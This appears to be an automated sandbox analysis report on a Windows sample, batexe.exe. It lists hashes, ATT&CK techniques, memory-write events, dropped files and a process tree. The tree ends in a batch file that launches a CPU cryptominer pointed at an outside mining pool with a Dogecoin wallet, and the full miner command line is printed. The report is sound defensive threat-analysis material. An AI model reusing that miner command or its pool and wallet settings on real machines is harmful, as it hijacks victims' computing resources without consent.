73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
297s
max time network
308s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
24/02/2024, 13:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
3996	b2e.exe
4028	cpuminer-sse2.exe

Loads dropped DLL 6 IoCs

pid	Process
4028	cpuminer-sse2.exe
4028	cpuminer-sse2.exe
4028	cpuminer-sse2.exe
4028	cpuminer-sse2.exe
4028	cpuminer-sse2.exe
4028	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3508-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3508 wrote to memory of 3996	3508	batexe.exe	91
PID 3508 wrote to memory of 3996	3508	batexe.exe	91
PID 3508 wrote to memory of 3996	3508	batexe.exe	91
PID 3996 wrote to memory of 1872	3996	b2e.exe	92
PID 3996 wrote to memory of 1872	3996	b2e.exe	92
PID 3996 wrote to memory of 1872	3996	b2e.exe	92
PID 1872 wrote to memory of 4028	1872	cmd.exe	95
PID 1872 wrote to memory of 4028	1872	cmd.exe	95

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3508
- C:\Users\Admin\AppData\Local\Temp\603C.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\603C.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\603C.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73D3.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1872
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4028

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\603C.tmp\b2e.exe

Filesize
475KB

MD5
0ba78cd47405b4450084e8c240737672

SHA1
07836ccc559c4689505d2a88d1cf8698996f0777

SHA256
fb59023a244825d9cef139b3fc86b323576581d18780aef7265be553d3aa6e37

SHA512
e85465d4def93b28d64642c68c794c7ea00863030fab845fe38b3fd021778282db44abc900089323979aac529ea19528e4564ab20b93119cc7111ba541599960

Download Submit
C:\Users\Admin\AppData\Local\Temp\603C.tmp\b2e.exe

Filesize
192KB

MD5
2b353b1a20b096777abdee3ae871a4f0

SHA1
1997d7d935b0ad972400f29a1504f18a03d18f2b

SHA256
1c1d66083512dd93ef61fd2f5062ef66c138c96360a9dc31f5f4892a9e760af4

SHA512
a42dbdd5c248cb88921b7f3a53117c9f2def16f8f51bd1a1c96b5ab01be5e36950a4a8d101ac6a7d0bd844179dd4f84205718d596c97b27fcff9394582988572

Download Submit
C:\Users\Admin\AppData\Local\Temp\603C.tmp\b2e.exe

Filesize
266KB

MD5
4fb5fa06e3a412c2e37cb4cb756611b8

SHA1
d64793bb75e3373258e312c69accff904424a027

SHA256
25d7dd918a8532880c46df2fab35c75ef9eeca12b40ced57698a04cce89c37ec

SHA512
892c5fad827256ac6c952d4d4ede14ff766ec85f5be4b7b823f9c44682bb7dcaba3bd8e03cf16e55c2910eec313cd932d2c78c7852040f4fbba12ceeba0ba59a

Download Submit
C:\Users\Admin\AppData\Local\Temp\73D3.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
112KB

MD5
69e85a0b007a9330ae3e080848470f4f

SHA1
99815ada3bd3a95bf4468ee35dd8f66b098365cd

SHA256
bd0767e3e14a0f4e21ecb67d7536869879a68948b790404727315832f39460b7

SHA512
6f348f2b731a2eec285d75d155eb315a116eedba2764b6d750f31429c05e14b32ca0c5122091481ccda9dad31dff2d80c73f44557e4acb65be7e4b52f8b11ddc

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
57KB

MD5
64968247286b64688de0b75553f688bf

SHA1
6f798a947c22dfa41f91d65ad9d87e42d6f7d196

SHA256
4caa70964618e1d2a1778da3bf6bfa1a50d3cfbb61572517e8cf8416b96c65a2

SHA512
a8533d40dbb38fba66b6f3e89c3085d457ce93a98a18f3276b85436f74581a877116fcb35faddd77dd929a6561ecad5209226a013b0dd8f52da82c7fcff944fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
73KB

MD5
1cfe49e3f0d6316abaa0f98a6e13dc2d

SHA1
76739d59d99da0c04ec4f01104a468ae3bd32c0b

SHA256
df1232a3ccbe10cca82c7b49361d2935ec231a39d05d72e676ba01d272f60db4

SHA512
6edf1d757e7ead91ff9d38e1fdd32ae81effa5985784001dbb1b28b0bdbc81f1885af3373d40527a100df5779ba2eca405120ee12ae753c5ca2716d15f2155bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
40KB

MD5
87566415c3d2b4279f532403be5eac15

SHA1
389c8a7ad67b4c5a5c115f1b4015424bfa145966

SHA256
b4f5cc0b9e68eb26ee5d98956af8f06ecc445da0604cc6319f61ddd23b1c4018

SHA512
5908380bcc159c1b59f5369110367cb59c3de1b624164c62fbe3f63c552cda6880589e681aeed99fcadc1fefbf626a5101603a9367b69600fc0c34c30ed35ed6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
5KB

MD5
7002ba03ab5f7bd3d9eae7a57b7a7353

SHA1
19ac825f6effc9a287cd2fe2d29231c309ad5b91

SHA256
cee4ea2c9de56fd76edd8be28b5f53fcaadfc1660e45e4049f911219af7e5eaf

SHA512
2ef000d9bd71808faf55ea1c2dd3d1b5faa8aa64f89510c28490963dd193a7725a4d47eac22e786505b3e1dcceed67156bb54dcb12b1b88680792220522e5f9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
19KB

MD5
ea5d5e739e54b4190bb444a22ce1ddb7

SHA1
3137bd4b6fe86b3d7b44beb0c3ae4588526a9cb3

SHA256
9dc9caea60a17653e802eeb902307d79e3165c021bf20b21b0ff4e5e6250a038

SHA512
c6da9fbea6338ca81ff597e6c74541c5f6fc26a4d1e885f9d52a2fbf07cfce050aa7c5e3df594d0236e8a4e1f651382ddd94487e849f72591bdca2e2098cd353

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
43KB

MD5
50edd1ec063770e67c4af1e414dbc2af

SHA1
d79e2e7be330ccbc31b9a98df7d1efca19315aa8

SHA256
8bcc3ade585eec666cb030edd0ceeffd51de99047eacec562115f008c9cd4ed1

SHA512
f29781cc2e63dc792d3c6ea0585db9f5d385ddfa2254a4afa2297f812bc98705b45b7931b8c8543e13616ab4d4749a021270a778e8b76f66c70a9df4fc61be30

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
49KB

MD5
9a901405a00af56cd55376dadce95e25

SHA1
344bb1ca206a92cadd090650a7d41f5110e29e33

SHA256
8480c9cadc96e36b93ef13d179643673ff6b9585e7f46cbc4f1e3912fcaf29fd

SHA512
d74ff816de8dac38d99ffd294259ac0866fc1fe0878a58ba8fa6c55c7756ce0b563333d00754990c0192d9b29a28b62158df4fd4fc1fccf0b542475b7b76b1dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
107KB

MD5
396328bd2b9b35404547ab506b8a5ea0

SHA1
064496d1c35685160c67ef3e0095a70ae806686f

SHA256
95bc794a9e4533b1033ffd7aa08170d26a63442702b193e5ac6991431aa7b22e

SHA512
773cd603673c93671ac546d365e20ea9e7d42ac36a5640c267b7b7b18d2f9ed4754db04e85cafd430a3d151a8da53ead5dd3de0457e2274ddc3a122fa25af212

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
27KB

MD5
254b984ae958b948f71d7e1f395197ad

SHA1
6fc74122f762f1a8e131faedb846931aac175fa9

SHA256
32c222cd2df4c42d312944f316c9a4e34c98782a32b09151fc41af62929e2be4

SHA512
aeff8aa3fdc64ef7dce90f33c32546bc6f7c8f53b948b26f7c6c4672688a308014cce1698a685479247b6e9cf8895f20f35379aad278e766e1039159a02b7174

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
1KB

MD5
d7c75b973084fc64536bef84775773ef

SHA1
4ba97a231c651cf0bb9f21c833d0e15d2c1057d3

SHA256
de7e877c905b61a5c6c6d5a60040ee125a9222cc4dabc1398393785bcdb82983

SHA512
e8c5afaa40f10c983ec4470ca3ebfcddd9d5ef4dcc61a4dee165ddfb63d878f9a9e56f74a447feb9337fa332fd94f057ec6de16622b030764aa78137e8a5a808

Download Submit
memory/3508-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3996-55-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3996-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4028-50-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4028-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4028-48-0x0000000001010000-0x00000000010CC000-memory.dmp

Filesize
752KB

Download
memory/4028-49-0x000000005EFE0000-0x000000005F078000-memory.dmp

Filesize
608KB

Download
memory/4028-47-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4028-42-0x0000000001010000-0x00000000010CC000-memory.dmp

Filesize
752KB

Download
memory/4028-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4028-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4028-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4028-46-0x000000006FC40000-0x00000000714F5000-memory.dmp

Filesize
24.7MB

Download
memory/4028-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4028-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4028-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4028-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4028-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4028-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4028-106-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download